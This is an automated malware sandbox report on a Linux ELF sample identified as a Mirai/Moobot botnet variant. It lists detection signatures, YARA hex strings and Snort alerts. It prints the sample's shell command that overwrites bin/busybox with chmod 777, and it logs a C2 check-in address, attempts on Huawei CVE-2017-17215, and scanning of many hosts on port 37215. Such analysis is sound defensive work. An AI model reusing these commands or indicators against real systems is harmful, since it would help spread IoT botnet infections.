Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
sduVQWDj8L.elf

Overview

General Information

Sample Name:sduVQWDj8L.elf
Original Sample Name:73f351e58cf41fb59c37b4196103c026.elf
Analysis ID:830728
MD5:73f351e58cf41fb59c37b4196103c026
SHA1:9337226b4d4876a4cb7eb287678360db263a6ef2
SHA256:04d57a6c870dec6d92d266d55ca978ab2f69a257e6f8d30e024af364e01ab166
Tags:32elfmiraimotorola
Infos:

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.

General Information

Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830728
Start date and time:2023-03-20 16:39:44 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 30s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:sduVQWDj8L.elf
Original Sample Name:73f351e58cf41fb59c37b4196103c026.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@1/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Runtime Messages

Command:/tmp/sduVQWDj8L.elf
PID:6230
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:mv: cannot stat '/tmp/sduVQWDj8L.elf'$'\377\377\377\377\377\377\354''H': No such file or directory
chmod: cannot access ''$'\377\354''Hbin/busybox': No such file or directory

Process Tree

  • system is lnxubuntu20
  • sduVQWDj8L.elf (PID: 6230, Parent: 6131, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/sduVQWDj8L.elf
    • sh (PID: 6232, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox\\xff\\xec0\\x80 && mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80; chmod 777 \\xff\\xecHbin/busybox"
      • sh New Fork (PID: 6234, Parent: 6232)
      • rm (PID: 6234, Parent: 6232, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 6235, Parent: 6232)
      • mkdir (PID: 6235, Parent: 6232, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6236, Parent: 6232)
      • mv (PID: 6236, Parent: 6232, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80
      • sh New Fork (PID: 6237, Parent: 6232)
      • chmod (PID: 6237, Parent: 6232, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 \\xff\\xecHbin/busybox
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sduVQWDj8L.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    sduVQWDj8L.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      sduVQWDj8L.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0xf68f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf6a3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf6b7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf6cb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf6df:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf6f3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf707:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf71b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf72f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf743:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf757:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf76b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf77f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf793:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf7a7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf7bb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf7cf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf7e3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf7f7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf80b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0xf81f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      6230.1.00007f5118001000.00007f5118013000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
        6230.1.00007f5118001000.00007f5118013000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6230.1.00007f5118001000.00007f5118013000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0xf68f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf6a3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf6b7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf6cb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf6df:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf6f3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf707:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf71b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf72f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf743:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf757:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf76b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf77f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf793:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf7a7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf7bb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf7cf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf7e3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf7f7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf80b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0xf81f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: sduVQWDj8L.elf PID: 6230JoeSecurity_MoobotYara detected MoobotJoe Security
            Process Memory Space: sduVQWDj8L.elf PID: 6230Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x1108:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x111c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1130:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1144:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1158:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x116c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1180:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1194:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x11f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x120c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1220:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1234:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1248:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x125c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1270:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1284:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x1298:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

            Snort Signatures

            Timestamp:192.168.2.2341.46.204.16833446372152835222 03/20/23-16:42:31.188141
            SID:2835222
            Source Port:33446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23103.161.181.9751628569992030490 03/20/23-16:40:34.606175
            SID:2030490
            Source Port:51628
            Destination Port:56999
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2341.232.131.21658510372152835222 03/20/23-16:41:11.152192
            SID:2835222
            Source Port:58510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.214.97.17549218372152835222 03/20/23-16:41:36.868569
            SID:2835222
            Source Port:49218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:103.161.181.97192.168.2.2356999516282030489 03/20/23-16:42:32.484003
            SID:2030489
            Source Port:56999
            Destination Port:51628
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: sduVQWDj8L.elfReversingLabs: Detection: 48%
            Source: sduVQWDj8L.elfVirustotal: Detection: 55%Perma Link

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:51628 -> 103.161.181.97:56999
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.161.181.97:56999 -> 192.168.2.23:51628
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58510 -> 41.232.131.216:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49218 -> 197.214.97.175:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33446 -> 41.46.204.168:37215
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 197.253.112.134 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.83.242.115 ports 1,2,3,5,7,37215
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 58510 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58510
            Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33446 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33446
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.158.188.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.157.228.113:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.219.99.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.253.112.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 171.99.213.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.20.200.11:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 126.132.247.147:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 8.158.15.21:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.165.156.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.42.65.114:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.108.14.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.35.249.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.217.145.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.69.250.238:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.235.172.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.201.116.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.245.242.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.211.201.195:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.203.8.246:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.21.87.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.106.161.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.138.118.183:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 84.59.223.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.170.104.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 74.150.93.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.112.226.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.194.243.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.24.174.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.0.226.18:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.209.177.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.207.229.240:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 185.240.108.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.97.9.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 67.121.157.4:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.204.161.23:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 122.247.154.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.70.109.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.194.15.96:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.19.18.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.89.32.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.149.215.72:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.27.156.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.10.2.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.202.21.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.159.182.121:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 87.188.1.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.208.158.113:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 58.108.150.242:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.209.112.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.42.3.57:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.175.90.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.229.4.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.96.182.92:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.76.199.241:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.137.57.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.86.237.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.225.131.167:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.34.148.233:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.224.217.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.92.146.90:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.96.66.83:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.118.96.185:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.241.118.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 123.186.225.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.166.82.110:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.138.141.21:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.254.12.136:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.104.244.206:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.181.110.220:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 159.96.157.165:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.249.14.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 200.111.204.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 223.199.71.20:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.116.254.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.222.234.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 2.228.151.168:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.246.138.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.93.9.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 148.195.75.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.87.47.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.49.186.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.41.244.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.238.17.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 156.28.181.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.41.208.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.189.64.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.165.95.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.108.242.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 93.150.177.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.111.170.201:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.39.118.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 181.182.117.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 130.84.58.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.67.175.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.200.180.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 86.243.212.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.108.198.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 206.27.212.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 75.118.43.252:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.221.16.20:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.195.89.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.114.21.66:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.25.179.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.235.167.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.164.208.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.16.8.138:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.106.49.43:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 51.195.190.167:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 47.2.2.27:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.165.193.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.159.217.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.92.240.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.41.225.84:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.86.161.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 50.119.158.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.23.188.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.54.217.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.116.220.104:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.80.23.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.162.174.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 198.25.148.102:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 109.243.108.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.34.53.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.194.68.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.29.27.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.240.68.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.134.125.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.202.185.177:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.247.85.9:37215
            Source: global trafficTCP traffic: 192.168.2.23:51628 -> 103.161.181.97:56999
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 37.55.57.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.112.158.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.188.92.0:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 107.12.217.49:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.157.171.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.125.204.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.80.191.220:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.44.63.118:37215
